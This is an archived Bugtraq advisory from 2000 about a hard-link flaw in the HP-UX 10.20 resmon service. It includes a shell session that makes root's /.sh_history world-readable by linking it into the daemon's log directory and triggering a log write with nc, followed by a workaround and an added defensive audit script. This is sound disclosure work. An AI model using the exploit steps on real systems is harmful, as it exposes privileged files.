[17554] in bugtraq
HP-UX 10.20 resource monitor service
daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Wed Nov 8 13:06:09 2000
Message-Id: <200011080851.KAA05777@gtc1.cps.unizar.es>
Date: Wed, 8 Nov 2000 10:51:28 +0200
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@SECURITYFOCUS.COM

Problem: on HP-UX 10.20 you can change any file on the root
partition to mode 644:

    $ uname -sr
    HP-UX B.10.20
    $ cd /etc/opt/resmon/log
    $ mv registrar.log registrar.log.orig
    $ ls -l /.sh_history
    -rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history
    $ ln /.sh_history registrar.log
    $ nc hpux.example.com 1712 < /etc/motd
    $ ls -l /.sh_history
    -rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history
    $ rm -f registrar.log
    $ mv registrar.log.orig registrar.log

So, /.sh_history becomes world readable, and text similar to

    -------------------Start Event--------------------
    Event 382 occurred at Wed Nov 8 09:45:28.818524 2000
    Process ID: 10931 (/etc/opt/resmon/lbin/registrar) Log Level: Error
    _rm_recv: Couldn't malloc 1073803312 bytes for receive buffer
    -------------------End Event----------------------

gets appended to it.

It seems it's fixed on HP-UX 11, so I guess there is already
a patch for 10.20

Workaround: chmod +t /etc/opt/resmon/log should work.

--
finger spd@gtc1.cps.unizar.es for PGP / So be easy and free
.mailcap tip of the day: / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null / (the pogues)
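
As an added example (not part of the original post and not vendor code), a POSIX shell check for the two conditions the session above depends on: a log directory that non-owners can write to without the sticky bit, and log files that carry more than one hard link. The function names are hypothetical, and the example assumes the directory is writable by the unprivileged user, as the session implies; the path in the usage comment is the one from the post.

```shell
#!/bin/sh
# Added example: audit a log directory for the two conditions the post relies on.
# Function names are hypothetical; nothing here is vendor code.

# dir_is_exposed DIR: exit 0 if DIR is group- or other-writable
# and the sticky bit is not set, so non-owners can rename or replace entries.
dir_is_exposed() {
    perms=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$perms" in
        d????w???[!tT] | d???????w[!tT]) return 0 ;;
    esac
    return 1
}

# multilinked_files DIR: print regular files under DIR whose link count is
# above 1; a log file that is a second name for another file shows up here.
multilinked_files() {
    find "$1" -type f -links +1 -print 2>/dev/null
}

# audit_logdir DIR: report both findings; exit status 1 if either is present.
audit_logdir() {
    rc=0
    if dir_is_exposed "$1"; then
        echo "EXPOSED: $1 is writable by non-owners and has no sticky bit"
        rc=1
    fi
    links=$(multilinked_files "$1")
    if [ -n "$links" ]; then
        echo "SUSPECT: files with more than one hard link:"
        echo "$links"
        rc=1
    fi
    return "$rc"
}

# Usage: sh audit.sh /etc/opt/resmon/log   (path taken from the post)
if [ "$#" -gt 0 ]; then
    audit_logdir "$1"
fi
```

After the workaround from the post is applied, `dir_is_exposed` no longer flags the directory; a file that `multilinked_files` still lists should be compared by inode against the rest of the filesystem before the daemon writes to it again.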